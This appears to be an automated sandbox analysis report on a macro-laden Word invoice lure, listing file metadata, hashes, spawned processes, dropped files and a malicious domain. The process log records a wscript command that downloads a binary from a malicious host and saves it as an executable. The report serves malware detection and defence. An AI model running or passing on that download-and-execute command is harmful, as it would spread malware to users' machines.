File name: | inv_261804.doc |
Full analysis: | https://app.any.run/tasks/8b234f80-f37f-45e1-a9d0-841651f0040b |
Verdict: | Malicious activity |
Analysis date: | February 21, 2020, 21:46:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 487EA5406A04BC22A793142B5AB87DE6 |
SHA1: | 50CA216F6FA3219927CD1676AF716DCE6D0C59C2 |
SHA256: | 01EA3845EAC489A2518962E6A9F968CDE0811E1531F5A58718FB02CF62541EDC |
SSDEEP: | 1536:hf03vE7LfAoH78R4tqWtyEPx0412G4g2Cdbiag:hyE7LfAOJoOx0A6ag |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
Creator: | - |
---|
ModifyDate: | 2020:02:20 13:47:00Z |
---|---|
CreateDate: | 2020:02:20 13:47:00Z |
RevisionNumber: | 1 |
LastModifiedBy: | - |
AppVersion: | 12 |
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 19 |
LinksUpToDate: | No |
TitlesOfParts: | |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | Password protected |
Application: | Microsoft Office Word |
Characters: | 18 |
Words: | 2 |
Pages: | 2 |
TotalEditTime: | - |
Template: | Normal.dotm |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1503 |
ZipCompressedSize: | 422 |
ZipCRC: | 0x840a1a99 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2896 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\inv_261804.doc.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.5123.5000 | ||||
788 | C:\Windows\system32\cmd.exe /c ""C:\DecemberLogs\Restaraunt2.cmd" " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2584 | "C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE" -x -s 1540 | C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Application Error Reporting Exit code: 0 Version: 14.0.4750.1000 | ||||
3016 | C:\Windows\system32\dwwin.exe -x -s 1540 | C:\Windows\system32\dwwin.exe | — | DW20.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Client Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2772 | wscript //nologo c:\DecemberLogs\OliviaMatter.vbs http://blueflag.xyz/nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin C:\DecemberLogs\Caff54e1.exe | C:\Windows\system32\wscript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 1 Version: 5.8.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2896 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD23C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2896 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\ATLEntityPickerLib.exd | tlb | |
MD5:127EFE01571AAD9261036A38FF8B592D | SHA256:49EA0BDAE65554BCA95F3281CE2F962780FE8A0C0F2A68E5835AD3D8777A09D3 | |||
2896 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSINKAUTLib.exd | tlb | |
MD5:8382562D2D4BBFF2494E6AA7257ADB27 | SHA256:B16A676718BA211132931AA3C445F79E0B3D2EAA6AD2EDF2F73661DE71FB00A9 | |||
2896 | WINWORD.EXE | C:\DecemberLogs\Restaraunt2.cmd | text | |
MD5:489E44E19F164BD7176EF7E341F48464 | SHA256:DAC5F163686C4A3162DBC3C041C60E0127241966FE305012604F98FD6F058AC0 | |||
2896 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:7D1A21571C77B2C8397F3632352CE54B | SHA256:941A8CEC00C16CB3186EA08B8C70C8C060D7E4F6F9DD66BE5F0E95EA4C5CD3A3 | |||
2896 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\inv_261804.doc.docm.LNK | lnk | |
MD5:A105CA5B3A539517056F9683B96D48BF | SHA256:16341D60A12868274A4C77B5A8B12F5EDCF30C6F7581F79AF784F98980F8E32A | |||
2896 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:C21BB06C57A1B4C04A5F8503BEC2F01D | SHA256:FE30A2E768AE15BEB4B9A54409285DDA04D5D369BA46B02ADE8D5138B483C3A9 | |||
2896 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\NODEMGRLib.exd | tlb | |
MD5:135B5899F11179CED3A165D66F15B2BB | SHA256:F27BC970EA50993B84F2B3AAAEEC517AC44474723B74087F16EABEE888E42403 | |||
2896 | WINWORD.EXE | C:\Users\admin\Desktop\~$v_261804.doc.docm | pgc | |
MD5:CB9B2CC6C7D675091BAA1E1986D79AAC | SHA256:E21D3DC6E031E5C6A621E7D593FB75B2474DFA147543198F4FC520784AED4BE4 | |||
2896 | WINWORD.EXE | C:\DecemberLogs\Restaraunt3.cmd | text | |
MD5:FAAB9D8C9983F14853FEE200CBA18EBA | SHA256:D0FB610E97EBFEF2FAF917D0AFCCBC41D3750E0F9C3ABC628D8DBBB808F064FC |
Domain | IP | Reputation |
---|---|---|
blueflag.xyz |
| malicious |